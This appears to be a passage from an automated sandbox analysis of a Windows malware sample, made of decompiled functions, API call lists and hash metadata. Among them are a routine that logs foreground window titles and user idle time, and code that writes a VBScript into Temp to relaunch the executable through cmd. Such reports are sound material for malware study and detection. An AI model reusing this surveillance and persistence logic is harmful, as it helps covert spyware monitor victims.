				void* _t224;
				char* _t226;
				signed int _t227;
				signed int _t231;
				signed int _t232;
				void* _t234;
				void* _t236;
				signed int _t237;
				signed int _t238;
				signed int _t239;
				signed int _t240;
				signed int _t241;
				signed int _t242;
				signed int _t243;
				signed int _t244;
				signed int _t245;
				signed int _t246;
				signed int _t247;
				signed int _t248;
				signed int _t249;
				signed int _t250;
				signed int _t251;
				signed int _t252;
				signed int _t253;
				signed int _t254;
				signed int _t255;
				signed int _t256;
				char* _t257;

				_t224 = __edx;
				_t210 = _a4;
				_v16 = 0;
				_v28 = _t210;
				_v24 = 0;
				if( *((intOrPtr*)(_t210 + 0xac)) != 0 ||  *((intOrPtr*)(_t210 + 0xb0)) != 0) {
					_t234 = E0070F348(0, 1, 0x50);
					_v8 = _t234;
					E007101F5(0);
					if(_t234 != 0) {
						_t227 = E0070F348(0, 1, 4);
						_v12 = _t227;
						E007101F5(0);
						if(_t227 != 0) {
							if( *((intOrPtr*)(_t210 + 0xac)) == 0) {
								_t213 = 0x14;
								memcpy(_v8, 0x73a188, _t213 << 2);
								L25:
								_t236 = _v8;
								_t231 = _v16;
								 *_t236 =  *( *(_t210 + 0x88));
								 *((intOrPtr*)(_t236 + 4)) =  *((intOrPtr*)( *(_t210 + 0x88) + 4));
								 *((intOrPtr*)(_t236 + 8)) =  *((intOrPtr*)( *(_t210 + 0x88) + 8));
								 *((intOrPtr*)(_t236 + 0x30)) =  *((intOrPtr*)( *(_t210 + 0x88) + 0x30));
								 *((intOrPtr*)(_t236 + 0x34)) =  *((intOrPtr*)( *(_t210 + 0x88) + 0x34));
								 *_v12 = 1;
								if(_t231 != 0) {
									 *_t231 = 1;
								}
								goto L27;
							}
							_t232 = E0070F348(0, 1, 4);
							_v16 = _t232;
							E007101F5(0);
							if(_t232 != 0) {
								_t233 =  *((intOrPtr*)(_t210 + 0xac));
								_t14 = _t234 + 0xc; // 0xc
								_t237 = E0071B0F4(_t210, _t224,  *((intOrPtr*)(_t210 + 0xac)), _t234,  &_v28, 1,  *((intOrPtr*)(_t210 + 0xac)), 0x15, _t14);
								_t238 = _t237 | E0071B0F4(_t210, _t224,  *((intOrPtr*)(_t210 + 0xac)), _t237,  &_v28, 1,  *((intOrPtr*)(_t210 + 0xac)), 0x14, _v8 + 0x10);
								_t239 = _t238 | E0071B0F4(_t210, _t224,  *((intOrPtr*)(_t210 + 0xac)), _t238,  &_v28, 1, _t233, 0x16, _v8 + 0x14);
								_t240 = _t239 | E0071B0F4(_t210, _t224, _t233, _t239,  &_v28, 1, _t233, 0x17, _v8 + 0x18);
								_v20 = _v8 + 0x1c;
								_t241 = _t240 | E0071B0F4(_t210, _t224, _t233, _t240,  &_v28, 1, _t233, 0x18, _v8 + 0x1c);
								_t242 = _t241 | E0071B0F4(_t210, _t224, _t233, _t241,  &_v28, 1, _t233, 0x50, _v8 + 0x20);
								_t243 = _t242 | E0071B0F4(_t210, _t224, _t233, _t242,  &_v28, 1, _t233, 0x51, _v8 + 0x24);
								_t244 = _t243 | E0071B0F4(_t210, _t224, _t233, _t243,  &_v28, 0, _t233, 0x1a, _v8 + 0x28);
								_t245 = _t244 | E0071B0F4(_t210, _t224, _t233, _t244,  &_v28, 0, _t233, 0x19, _v8 + 0x29);
								_t246 = _t245 | E0071B0F4(_t210, _t224, _t233, _t245,  &_v28, 0, _t233, 0x54, _v8 + 0x2a);
								_t247 = _t246 | E0071B0F4(_t210, _t224, _t233, _t246,  &_v28, 0, _t233, 0x55, _v8 + 0x2b);
								_t248 = _t247 | E0071B0F4(_t210, _t224, _t233, _t247,  &_v28, 0, _t233, 0x56, _v8 + 0x2c);
								_t249 = _t248 | E0071B0F4(_t210, _t224, _t233, _t248,  &_v28, 0, _t233, 0x57, _v8 + 0x2d);
								_t250 = _t249 | E0071B0F4(_t210, _t224, _t233, _t249,  &_v28, 0, _t233, 0x52, _v8 + 0x2e);
								_t251 = _t250 | E0071B0F4(_t210, _t224, _t233, _t250,  &_v28, 0, _t233, 0x53, _v8 + 0x2f);
								_t252 = _t251 | E0071B0F4(_t210, _t224, _t233, _t251,  &_v28, 2, _t233, 0x15, _v8 + 0x38);
								_t253 = _t252 | E0071B0F4(_t210, _t224, _t233, _t252,  &_v28, 2, _t233, 0x14, _v8 + 0x3c);
								_t254 = _t253 | E0071B0F4(_t210, _t224, _t233, _t253,  &_v28, 2, _t233, 0x16, _v8 + 0x40);
								_t255 = _t254 | E0071B0F4(_t210, _t224, _t233, _t254,  &_v28, 2, _t233, 0x17, _v8 + 0x44);
								_t256 = _t255 | E0071B0F4(_t210, _t224, _t233, _t255,  &_v28, 2, _t233, 0x50, _v8 + 0x48);
								if((E0071B0F4(_t210, _t224, _t233, _t256,  &_v28, 2, _t233, 0x51, _v8 + 0x4c) | _t256) == 0) {
									_t226 =  *_v20;
									while( *_t226 != 0) {
										_t195 =  *_t226;
										if(_t195 < 0x30 || _t195 > 0x39) {
											if(_t195 != 0x3b) {
												goto L17;
											}
											_t257 = _t226;
											do {
												 *_t257 =  *((intOrPtr*)(_t257 + 1));
												_t257 = _t257 + 1;
											} while ( *_t257 != 0);
										} else {
											 *_t226 = _t195 - 0x30;
											L17:
											_t226 = _t226 + 1;
										}
									}
									goto L25;
								}
								E00718782(_v8);
								E007101F5(_v8);
								E007101F5(_v12);
								E007101F5(_v16);
								goto L4;
							}
							E007101F5(_t234);
							E007101F5(_v12);
							L7:
							goto L4;
						}
						E007101F5(_t234);
						goto L7;
					}
					L4:
					return 1;
				} else {
					_t231 = 0;
					_v12 = 0;
					_t236 = 0x73a188;
					L27:
					_t105 =  *(_t210 + 0x84);
					if(_t105 != 0) {
						asm("lock dec dword [eax]");
					}
					if( *((intOrPtr*)(_t210 + 0x7c)) != 0) {
						asm("lock xadd [ecx], eax");
						if((_t105 | 0xffffffff) == 0) {
							E007101F5( *(_t210 + 0x88));
							E007101F5( *((intOrPtr*)(_t210 + 0x7c)));
						}
					}
					 *((intOrPtr*)(_t210 + 0x7c)) = _v12;
					 *(_t210 + 0x84) = _t231;
					 *(_t210 + 0x88) = _t236;
					return 0;
				}
			}












































                                    0x00718880
                                    0x00718889
                                    0x00718890
                                    0x00718893
                                    0x00718896
                                    0x0071889f
                                    0x007188c1
                                    0x007188c5
                                    0x007188c8
                                    0x007188d2
                                    0x007188e5
                                    0x007188e9
                                    0x007188ec
                                    0x007188f6
                                    0x00718908
                                    0x00718b9e
                                    0x00718b9f
                                    0x00718ba1
                                    0x00718ba9
                                    0x00718bad
                                    0x00718bb2
                                    0x00718bbd
                                    0x00718bc9
                                    0x00718bd5
                                    0x00718be1
                                    0x00718be7
                                    0x00718beb
                                    0x00718bed
                                    0x00718bed
                                    0x00000000
                                    0x00718beb
                                    0x00718917
                                    0x0071891b
                                    0x0071891e
                                    0x00718928
                                    0x0071893c
                                    0x00718942
                                    0x00718957
                                    0x0071896b
                                    0x00718982
                                    0x0071899c
                                    0x007189a4
                                    0x007189b6
                                    0x007189cd
                                    0x007189e4
                                    0x007189fe
                                    0x00718a15
                                    0x00718a2c
                                    0x00718a43
                                    0x00718a5d
                                    0x00718a74
                                    0x00718a8b
                                    0x00718aa2
                                    0x00718abc
                                    0x00718ad3
                                    0x00718aea
                                    0x00718b01
                                    0x00718b1b
                                    0x00718b37
                                    0x00718b65
                                    0x00718b78
                                    0x00718b69
                                    0x00718b6d
                                    0x00718b81
                                    0x00000000
                                    0x00000000
                                    0x00718b83
                                    0x00718b85
                                    0x00718b88
                                    0x00718b8a
                                    0x00718b8d
                                    0x00718b73
                                    0x00718b75
                                    0x00718b77
                                    0x00718b77
                                    0x00718b77
                                    0x00718b6d
                                    0x00000000
                                    0x00718b7d
                                    0x00718b3d
                                    0x00718b43
                                    0x00718b4c
                                    0x00718b55
                                    0x00000000
                                    0x00718b5a
                                    0x0071892b
                                    0x00718934
                                    0x007188fe
                                    0x00000000
                                    0x007188fe
                                    0x007188f9
                                    0x00000000
                                    0x007188f9
                                    0x007188d4
                                    0x00000000
                                    0x007188a9
                                    0x007188a9
                                    0x007188ab
                                    0x007188ae
                                    0x00718bef
                                    0x00718bef
                                    0x00718bf7
                                    0x00718bf9
                                    0x00718bf9
                                    0x00718c01
                                    0x00718c06
                                    0x00718c0a
                                    0x00718c12
                                    0x00718c1a
                                    0x00718c20
                                    0x00718c0a
                                    0x00718c24
                                    0x00718c29
                                    0x00718c2f
                                    0x00000000
                                    0x00718c2f

                                    APIs
                                    Memory Dump Source
                                    • Source File: 0000001C.00000002.409473011.00000000006D0000.00000040.00000001.sdmp, Offset: 006D0000, based on PE: true
                                    • Associated: 0000001C.00000002.409660028.000000000073F000.00000040.00000001.sdmp Download File
                                    Yara matches
                                    Similarity
                                    • API ID: _free
                                    • String ID:
                                    • API String ID: 269201875-0
                                    • Opcode ID: 8b184d28bf9a30783ad1be017c58ab05367fe3e3b3352a6266470ccd7f68be4d
                                    • Instruction ID: 113754584f76763c96937a0da460ba843c2a7b0e5bd2280900d86b4b6378de38
                                    • Opcode Fuzzy Hash: 8b184d28bf9a30783ad1be017c58ab05367fe3e3b3352a6266470ccd7f68be4d
                                    • Instruction Fuzzy Hash: 46C125B1E40204EFDB60DBACCC86FDE77B8AB08700F154165FA04EB2C2D674A9859761
                                    Uniqueness

                                    Uniqueness Score: -1.00%

                                    Function 0071F255, Relevance: 17.8, APIs: 9, Strings: 1, Instructions: 272COMMON
                                    Download Yara Rule
                                    C-Code - Quality: 41%
                                    			E0071F255(void* __ecx, intOrPtr* _a4, signed int* _a8, intOrPtr _a12, signed int _a16, intOrPtr _a20, intOrPtr _a24) {
				signed int _v5;
				char _v6;
				void* _v12;
				signed int _v16;
				signed int _v20;
				char _v24;
				intOrPtr _v36;
				signed int _v44;
				void _v48;
				char _v72;
				void* __ebx;
				void* __edi;
				void* __esi;
				void* __ebp;
				signed int _t114;
				signed int _t123;
				signed char _t124;
				signed int _t134;
				intOrPtr _t164;
				intOrPtr _t180;
				signed int* _t190;
				signed int _t192;
				char _t197;
				signed int _t203;
				signed int _t206;
				signed int _t215;
				signed int _t217;
				signed int _t219;
				signed int _t225;
				signed int _t227;
				signed int _t234;
				signed int _t235;
				signed int _t237;
				signed int _t239;
				signed char _t242;
				intOrPtr _t245;
				void* _t248;
				void* _t252;
				void* _t262;
				signed int _t263;
				signed int _t266;
				signed int _t269;
				signed int _t270;
				void* _t272;
				void* _t274;
				void* _t275;
				void* _t277;
				void* _t278;
				void* _t280;
				void* _t284;

				_t262 = E0071EFB8(__ecx,  &_v72, _a16, _a20, _a24);
				_t192 = 6;
				memcpy( &_v48, _t262, _t192 << 2);
				_t274 = _t272 + 0x1c;
				_t248 = _t262 + _t192 + _t192;
				_t263 = _t262 | 0xffffffff;
				if(_v36 != _t263) {
					_t114 = E00718575(_t248, _t263, __eflags);
					_t190 = _a8;
					 *_t190 = _t114;
					__eflags = _t114 - _t263;
					if(_t114 != _t263) {
						_v20 = _v20 & 0x00000000;
						_v24 = 0xc;
						_t275 = _t274 - 0x18;
						 *_a4 = 1;
						_push(6);
						_v16 =  !(_a16 >> 7) & 1;
						_push( &_v24);
						_push(_a12);
						memcpy(_t275,  &_v48, 1 << 2);
						_t197 = 0;
						_t252 = E0071EF23();
						_t277 = _t275 + 0x2c;
						_v12 = _t252;
						__eflags = _t252 - 0xffffffff;
						if(_t252 != 0xffffffff) {
							L11:
							_t123 = GetFileType(_t252);
							__eflags = _t123;
							if(_t123 != 0) {
								__eflags = _t123 - 2;
								if(_t123 != 2) {
									__eflags = _t123 - 3;
									_t124 = _v48;
									if(_t123 == 3) {
										_t124 = _t124 | 0x00000008;
										__eflags = _t124;
									}
								} else {
									_t124 = _v48 | 0x00000040;
								}
								_v5 = _t124;
								E007184BE(_t197,  *_t190, _t252);
								_t242 = _v5 | 0x00000001;
								_v5 = _t242;
								_v48 = _t242;
								 *( *((intOrPtr*)(0x73b800 + ( *_t190 >> 6) * 4)) + 0x28 + ( *_t190 & 0x0000003f) * 0x30) = _t242;
								_t203 =  *_t190;
								_t205 = (_t203 & 0x0000003f) * 0x30;
								__eflags = _a16 & 0x00000002;
								 *((char*)( *((intOrPtr*)(0x73b800 + (_t203 >> 6) * 4)) + 0x29 + (_t203 & 0x0000003f) * 0x30)) = 0;
								if((_a16 & 0x00000002) == 0) {
									L20:
									_v6 = 0;
									_push( &_v6);
									_push(_a16);
									_t278 = _t277 - 0x18;
									_t206 = 6;
									_push( *_t190);
									memcpy(_t278,  &_v48, _t206 << 2);
									_t134 = E0071ECD6(_t190,  &_v48 + _t206 + _t206,  &_v48);
									_t280 = _t278 + 0x30;
									__eflags = _t134;
									if(__eflags == 0) {
										 *((char*)( *((intOrPtr*)(0x73b800 + ( *_t190 >> 6) * 4)) + 0x29 + ( *_t190 & 0x0000003f) * 0x30)) = _v6;
										 *( *((intOrPtr*)(0x73b800 + ( *_t190 >> 6) * 4)) + 0x2d + ( *_t190 & 0x0000003f) * 0x30) =  *( *((intOrPtr*)(0x73b800 + ( *_t190 >> 6) * 4)) + 0x2d + ( *_t190 & 0x0000003f) * 0x30) ^ (_a16 >> 0x00000010 ^  *( *((intOrPtr*)(0x73b800 + ( *_t190 >> 6) * 4)) + 0x2d + ( *_t190 & 0x0000003f) * 0x30)) & 0x00000001;
										__eflags = _v5 & 0x00000048;
										if((_v5 & 0x00000048) == 0) {
											__eflags = _a16 & 0x00000008;
											if((_a16 & 0x00000008) != 0) {
												_t225 =  *_t190;
												_t227 = (_t225 & 0x0000003f) * 0x30;
												_t164 =  *((intOrPtr*)(0x73b800 + (_t225 >> 6) * 4));
												_t87 = _t164 + _t227 + 0x28;
												 *_t87 =  *(_t164 + _t227 + 0x28) | 0x00000020;
												__eflags =  *_t87;
											}
										}
										_t266 = _v44;
										__eflags = (_t266 & 0xc0000000) - 0xc0000000;
										if((_t266 & 0xc0000000) != 0xc0000000) {
											L31:
											__eflags = 0;
											return 0;
										} else {
											__eflags = _a16 & 0x00000001;
											if((_a16 & 0x00000001) == 0) {
												goto L31;
											}
											CloseHandle(_v12);
											_v44 = _t266 & 0x7fffffff;
											_t215 = 6;
											_push( &_v24);
											_push(_a12);
											memcpy(_t280 - 0x18,  &_v48, _t215 << 2);
											_t245 = E0071EF23();
											__eflags = _t245 - 0xffffffff;
											if(_t245 != 0xffffffff) {
												_t217 =  *_t190;
												_t219 = (_t217 & 0x0000003f) * 0x30;
												__eflags = _t219;
												 *((intOrPtr*)( *((intOrPtr*)(0x73b800 + (_t217 >> 6) * 4)) + _t219 + 0x18)) = _t245;
												goto L31;
											}
											E0070A4CE(GetLastError());
											 *( *((intOrPtr*)(0x73b800 + ( *_t190 >> 6) * 4)) + 0x28 + ( *_t190 & 0x0000003f) * 0x30) =  *( *((intOrPtr*)(0x73b800 + ( *_t190 >> 6) * 4)) + 0x28 + ( *_t190 & 0x0000003f) * 0x30) & 0x000000fe;
											E00718687( *_t190);
											L10:
											goto L2;
										}
									}
									_t269 = _t134;
									goto L22;
								} else {
									_t269 = E0071F134(_t205,  *_t190);
									__eflags = _t269;
									if(__eflags != 0) {
										L22:
										E0071551E(__eflags,  *_t190);
										return _t269;
									}
									goto L20;
								}
							}
							_t270 = GetLastError();
							E0070A4CE(_t270);
							 *( *((intOrPtr*)(0x73b800 + ( *_t190 >> 6) * 4)) + 0x28 + ( *_t190 & 0x0000003f) * 0x30) =  *( *((intOrPtr*)(0x73b800 + ( *_t190 >> 6) * 4)) + 0x28 + ( *_t190 & 0x0000003f) * 0x30) & 0x000000fe;
							CloseHandle(_t252);
							__eflags = _t270;
							if(_t270 == 0) {
								 *((intOrPtr*)(E0070A504())) = 0xd;
							}
							goto L2;
						}
						_t234 = _v44;
						__eflags = (_t234 & 0xc0000000) - 0xc0000000;
						if((_t234 & 0xc0000000) != 0xc0000000) {
							L9:
							_t235 =  *_t190;
							_t237 = (_t235 & 0x0000003f) * 0x30;
							_t180 =  *((intOrPtr*)(0x73b800 + (_t235 >> 6) * 4));
							_t33 = _t180 + _t237 + 0x28;
							 *_t33 =  *(_t180 + _t237 + 0x28) & 0x000000fe;
							__eflags =  *_t33;
							E0070A4CE(GetLastError());
							goto L10;
						}
						__eflags = _a16 & 0x00000001;
						if((_a16 & 0x00000001) == 0) {
							goto L9;
						}
						_t284 = _t277 - 0x18;
						_v44 = _t234 & 0x7fffffff;
						_t239 = 6;
						_push( &_v24);
						_push(_a12);
						memcpy(_t284,  &_v48, _t239 << 2);
						_t197 = 0;
						_t252 = E0071EF23();
						_t277 = _t284 + 0x2c;
						_v12 = _t252;
						__eflags = _t252 - 0xffffffff;
						if(_t252 != 0xffffffff) {
							goto L11;
						}
						goto L9;
					} else {
						 *(E0070A4F1()) =  *_t186 & 0x00000000;
						 *_t190 = _t263;
						 *((intOrPtr*)(E0070A504())) = 0x18;
						goto L2;
					}
				} else {
					 *(E0070A4F1()) =  *_t188 & 0x00000000;
					 *_a8 = _t263;
					L2:
					return  *((intOrPtr*)(E0070A504()));
				}
			}





















































                                    0x0071f278
                                    0x0071f27c
                                    0x0071f27d
                                    0x0071f27d
                                    0x0071f27d
                                    0x0071f27f
                                    0x0071f285
                                    0x0071f2a0
                                    0x0071f2a5
                                    0x0071f2a8
                                    0x0071f2aa
                                    0x0071f2ac
                                    0x0071f2cb
                                    0x0071f2d2
                                    0x0071f2d9
                                    0x0071f2dc
                                    0x0071f2e8
                                    0x0071f2eb
                                    0x0071f2f3
                                    0x0071f2f4
                                    0x0071f2f7
                                    0x0071f2f7
                                    0x0071f2fe
                                    0x0071f300
                                    0x0071f303
                                    0x0071f30b
                                    0x0071f30e
                                    0x0071f37b
                                    0x0071f37c
                                    0x0071f382
                                    0x0071f384
                                    0x0071f3cd
                                    0x0071f3d0
                                    0x0071f3d9
                                    0x0071f3dc
                                    0x0071f3df
                                    0x0071f3e1
                                    0x0071f3e1
                                    0x0071f3e1
                                    0x0071f3d2
                                    0x0071f3d5
                                    0x0071f3d5
                                    0x0071f3e6
                                    0x0071f3e9
                                    0x0071f3f5
                                    0x0071f3fa
                                    0x0071f406
                                    0x0071f410
                                    0x0071f414
                                    0x0071f41e
                                    0x0071f421
                                    0x0071f42c
                                    0x0071f431
                                    0x0071f441
                                    0x0071f444
                                    0x0071f448
                                    0x0071f449
                                    0x0071f44f
                                    0x0071f454
                                    0x0071f457
                                    0x0071f459
                                    0x0071f45b
                                    0x0071f460
                                    0x0071f463
                                    0x0071f465
                                    0x0071f48f
                                    0x0071f4b3
                                    0x0071f4b7
                                    0x0071f4bb
                                    0x0071f4bd
                                    0x0071f4c1
                                    0x0071f4c3
                                    0x0071f4cd
                                    0x0071f4d0
                                    0x0071f4d7
                                    0x0071f4d7
                                    0x0071f4d7
                                    0x0071f4d7
                                    0x0071f4c1
                                    0x0071f4dc
                                    0x0071f4e8
                                    0x0071f4ea
                                    0x0071f575
                                    0x0071f575
                                    0x00000000
                                    0x0071f4f0
                                    0x0071f4f0
                                    0x0071f4f4
                                    0x00000000
                                    0x00000000
                                    0x0071f4f9
                                    0x0071f50b
                                    0x0071f513
                                    0x0071f516
                                    0x0071f517
                                    0x0071f51a
                                    0x0071f521
                                    0x0071f526
                                    0x0071f529
                                    0x0071f55d
                                    0x0071f567
                                    0x0071f567
                                    0x0071f571
                                    0x00000000
                                    0x0071f571
                                    0x0071f532
                                    0x0071f54b
                                    0x0071f552
                                    0x0071f375
                                    0x00000000
                                    0x0071f375
                                    0x0071f4ea
                                    0x0071f467
                                    0x00000000
                                    0x0071f433
                                    0x0071f43a
                                    0x0071f43d
                                    0x0071f43f
                                    0x0071f469
                                    0x0071f46b
                                    0x00000000
                                    0x0071f471
                                    0x00000000
                                    0x0071f43f
                                    0x0071f431
                                    0x0071f38c
                                    0x0071f38f
                                    0x0071f3aa
                                    0x0071f3af
                                    0x0071f3b5
                                    0x0071f3b7
                                    0x0071f3c2
                                    0x0071f3c2
                                    0x00000000
                                    0x0071f3b7
                                    0x0071f310
                                    0x0071f317
                                    0x0071f319
                                    0x0071f350
                                    0x0071f350
                                    0x0071f35a
                                    0x0071f35d
                                    0x0071f364
                                    0x0071f364
                                    0x0071f364
                                    0x0071f370
                                    0x00000000
                                    0x0071f370
                                    0x0071f31b
                                    0x0071f31f
                                    0x00000000
                                    0x00000000
                                    0x0071f321
                                    0x0071f330
                                    0x0071f335
                                    0x0071f338
                                    0x0071f339
                                    0x0071f33c
                                    0x0071f33c
                                    0x0071f343
                                    0x0071f345
                                    0x0071f348
                                    0x0071f34b
                                    0x0071f34e
                                    0x00000000
                                    0x00000000
                                    0x00000000
                                    0x0071f2ae
                                    0x0071f2b3
                                    0x0071f2b6
                                    0x0071f2bd
                                    0x00000000
                                    0x0071f2bd
                                    0x0071f287
                                    0x0071f28c
                                    0x0071f292
                                    0x0071f294
                                    0x00000000
                                    0x0071f299

                                    APIs
                                      • Part of subcall function 0071EF23: CreateFileW.KERNEL32(00000000,00000000,?,0071F2FE,?,?,00000000,?,0071F2FE,00000000,0000000C), ref: 0071EF40
                                    • GetLastError.KERNEL32 ref: 0071F369
                                    • __dosmaperr.LIBCMT ref: 0071F370
                                    • GetFileType.KERNEL32(00000000), ref: 0071F37C
                                    • GetLastError.KERNEL32 ref: 0071F386
                                    • __dosmaperr.LIBCMT ref: 0071F38F
                                    • CloseHandle.KERNEL32(00000000), ref: 0071F3AF
                                    • CloseHandle.KERNEL32(?), ref: 0071F4F9
                                    • GetLastError.KERNEL32 ref: 0071F52B
                                    • __dosmaperr.LIBCMT ref: 0071F532
                                    Strings
                                    Memory Dump Source
                                    • Source File: 0000001C.00000002.409473011.00000000006D0000.00000040.00000001.sdmp, Offset: 006D0000, based on PE: true
                                    • Associated: 0000001C.00000002.409660028.000000000073F000.00000040.00000001.sdmp Download File
                                    Yara matches
                                    Similarity
                                    • API ID: ErrorLast__dosmaperr$CloseFileHandle$CreateType
                                    • String ID: H
                                    • API String ID: 4237864984-2852464175
                                    • Opcode ID: 3015742b08412d800a8334900f9c799552bba58c4b90791f7f0aaf0f648f057f
                                    • Instruction ID: f74ff90b3d3b561967fccfd5e2ae37b9758f60560666e69bc413fc969b1effd3
                                    • Opcode Fuzzy Hash: 3015742b08412d800a8334900f9c799552bba58c4b90791f7f0aaf0f648f057f
                                    • Instruction Fuzzy Hash: 5CA14332A101499FDF189F6CD8867EE7BE1AB06320F144269F811DB2D1DB3C8952CB92
                                    Uniqueness

                                    Uniqueness Score: -1.00%

                                    Function 006D9195, Relevance: 17.7, APIs: 6, Strings: 4, Instructions: 156sleepCOMMON
                                    Download Yara Rule
                                    C-Code - Quality: 89%
                                    			E006D9195(void* __ecx, void* __edx) {
				char _v28;
				char _v56;
				char _v76;
				char _v80;
				char _v100;
				void* _v104;
				char _v108;
				char _v112;
				struct HWND__* _v116;
				void* __ebx;
				void* __edi;
				int _t36;
				struct HWND__* _t42;
				void* _t50;
				int _t57;
				struct HWND__* _t77;
				void* _t119;
				signed int _t125;
				void* _t127;

				_t112 = __edx;
				_t127 = (_t125 & 0xfffffff8) - 0x74;
				_push(_t77);
				_push(0xea60);
				_t119 = __ecx;
				while( *((char*)(_t119 + 0x49)) != 0 ||  *((char*)(_t119 + 0x4a)) != 0) {
					Sleep(0x1f4);
					_t77 = GetForegroundWindow();
					_t36 = GetWindowTextLengthW(_t77);
					_t4 = _t36 + 1; // 0x1
					E006D9DEC(_t77,  &_v100, _t112, _t119, _t4, 0);
					if(_t36 != 0) {
						_t57 = E006D2489();
						GetWindowTextW(_t77, E006D1EEB( &_v100), _t57);
						_t112 = 0x73dd0c;
						if(E006D9EAC(0x73dd0c) == 0) {
							E006D9DD2(0x73dd0c,  &_v100);
							E006D733F(E006D2489() - 1);
							_t127 = _t127 - 0x18;
							_t136 =  *0x73c39b;
							if( *0x73c39b == 0) {
								_t112 = E006D9E69( &_v76, L"\r\n[ ", __eflags,  &_v108);
								E006D30A6(_t77, _t127, _t67, _t119, __eflags, L" ]\r\n");
								E006D8B80(_t119);
								E006D1EF0();
							} else {
								E006D7350(_t77, _t127, 0x73dd0c, _t136,  &_v108);
								E006D9634(_t77, _t119, _t136);
							}
						}
					}
					_t83 = _t119;
					E006D9C15(_t119);
					if(E006E71D6(_t119) < 0xea60) {
						L18:
						E006D1EF0();
						continue;
					} else {
						_t77 = _v116;
						while( *((char*)(_t119 + 0x49)) != 0 ||  *((char*)(_t119 + 0x4a)) != 0) {
							_t42 = E006E71D6(_t83);
							if(_t42 < 0xea60) {
								__eflags = _t77 % 0xea60;
								E0070BACE(_t83, _t77 / 0xea60,  &_v112, 0xa);
								_t50 = E006D5343(_t77,  &_v80, E006D75C2(_t77,  &_v56, "\r\n{ User has been idle for ", _t119, __eflags, E006D2084(_t77,  &_v28,  &_v112)), _t119, __eflags, " minutes }\r\n");
								_t127 = _t127 + 0xc - 0x14;
								_t112 = _t50;
								E006E72DA(_t127, _t50);
								E006D8B80(_t119);
								E006D1FC7();
								E006D1FC7();
								E006D1FC7();
								goto L18;
							}
							_t77 = _t42;
							_v116 = _t77;
							Sleep(0x3e8);
						}
						E006D1EF0();
						break;
					}
				}
				__eflags = 0;
				return 0;
			}






















                                    0x006d9195
                                    0x006d919b
                                    0x006d919e
                                    0x006d919f
                                    0x006d91a1
                                    0x006d91a3
                                    0x006d9202
                                    0x006d920e
                                    0x006d9211
                                    0x006d921b
                                    0x006d9223
                                    0x006d922a
                                    0x006d9234
                                    0x006d9245
                                    0x006d924b
                                    0x006d925b
                                    0x006d9267
                                    0x006d927b
                                    0x006d9280
                                    0x006d9287
                                    0x006d928e
                                    0x006d92b8
                                    0x006d92bc
                                    0x006d92c4
                                    0x006d92cd
                                    0x006d9290
                                    0x006d9293
                                    0x006d929a
                                    0x006d929a
                                    0x006d928e
                                    0x006d925b
                                    0x006d92d2
                                    0x006d92d4
                                    0x006d92e5
                                    0x006d938d
                                    0x006d9391
                                    0x00000000
                                    0x006d92eb
                                    0x006d92eb
                                    0x006d92ef
                                    0x006d92ff
                                    0x006d9306
                                    0x006d9326
                                    0x006d9329
                                    0x006d935a
                                    0x006d935f
                                    0x006d9362
                                    0x006d9366
                                    0x006d936d
                                    0x006d9376
                                    0x006d937f
                                    0x006d9388
                                    0x00000000
                                    0x006d9388
                                    0x006d9308
                                    0x006d930f
                                    0x006d9313
                                    0x006d9313
                                    0x006d939f
                                    0x00000000
                                    0x006d939f
                                    0x006d92e5
                                    0x006d93a6
                                    0x006d93ac

                                    APIs
                                    • __Init_thread_footer.LIBCMT ref: 006D91F7
                                    • Sleep.KERNEL32(000001F4), ref: 006D9202
                                    • GetForegroundWindow.USER32 ref: 006D9208
                                    • GetWindowTextLengthW.USER32(00000000), ref: 006D9211
                                    • GetWindowTextW.USER32 ref: 006D9245
                                    • Sleep.KERNEL32(000003E8), ref: 006D9313
                                      • Part of subcall function 006D9E69: char_traits.LIBCPMT ref: 006D9E79
                                      • Part of subcall function 006D8B80: SetEvent.KERNEL32(?,?,?,?,006D9CFC,?,?,?,?,?,00000000), ref: 006D8BAD
                                    Strings
                                    Memory Dump Source
                                    • Source File: 0000001C.00000002.409473011.00000000006D0000.00000040.00000001.sdmp, Offset: 006D0000, based on PE: true
                                    • Associated: 0000001C.00000002.409660028.000000000073F000.00000040.00000001.sdmp Download File
                                    Yara matches
                                    Similarity
                                    • API ID: Window$SleepText$EventForegroundInit_thread_footerLengthchar_traits
                                    • String ID: [ ${ User has been idle for $ ]$ minutes }
                                    • API String ID: 107669343-3343415809
                                    • Opcode ID: 58ad1c743f3e84d86d6eea8774a5326908f5ca56e05dfaffd722b0f49ebba19a
                                    • Instruction ID: 2e4ad7ce683096df61071847f42b1aa47c51f4ddabf2a070513f2d07c5f3b9e1
                                    • Opcode Fuzzy Hash: 58ad1c743f3e84d86d6eea8774a5326908f5ca56e05dfaffd722b0f49ebba19a
                                    • Instruction Fuzzy Hash: D151F771A183416BD354F734D896AAE77A7AF84310F00052FF886863D2DF689E45C6AA
                                    Uniqueness

                                    Uniqueness Score: -1.00%

                                    Function 006DB488, Relevance: 17.6, APIs: 3, Strings: 7, Instructions: 148COMMON
                                    Download Yara Rule
                                    C-Code - Quality: 100%
                                    			E006DB488(void* __ebx, void* __eflags) {
				char _v28;
				char _v52;
				char _v76;
				char _v100;
				char _v124;
				char _v148;
				char _v172;
				char _v196;
				short _v716;
				void* __edi;
				void* __ebp;
				void* _t36;
				void* _t37;
				void* _t40;
				void* _t54;
				void* _t67;
				void* _t68;
				void* _t79;

				_t79 = __ebx;
				E006E015B();
				_t36 = E006D2489();
				_t37 = E006D1F95(0x73c560);
				_t40 = E006E0A30(E006D1F95(0x73c518), "exepath",  &_v716, 0x208, _t37, _t36);
				_t140 = _t40;
				if(_t40 == 0) {
					GetModuleFileNameW(0,  &_v716, 0x208);
				}
				E006D30A6(_t79,  &_v124, E006E72DA( &_v52, E006E7093( &_v76)), 0, _t140, L".vbs");
				E006D1EF0();
				E006D1FC7();
				E006D4429(_t79,  &_v100, E006D30A6(_t79,  &_v76, E006D427F(_t79,  &_v52, E0070987F(_t79,  &_v76, _t140, L"Temp")), 0, _t140, "\\"), _t140,  &_v124);
				E006D1EF0();
				E006D1EF0();
				E006D1F6D(_t79,  &_v28);
				_t54 = E006D427F(_t79,  &_v196, L"\"\"\", 0");
				E006D3311(E006D30A6(_t79,  &_v76, E006D3030( &_v52, E006D30A6(_t79,  &_v148, E006D427F(_t79,  &_v172, L"CreateObject(\"WScript.Shell\").Run \"cmd /c \"\""), 0, _t140,  &_v716), _t54), 0, _t140, "\n"));
				E006D1EF0();
				E006D1EF0();
				E006D1EF0();
				E006D1EF0();
				E006D1EF0();
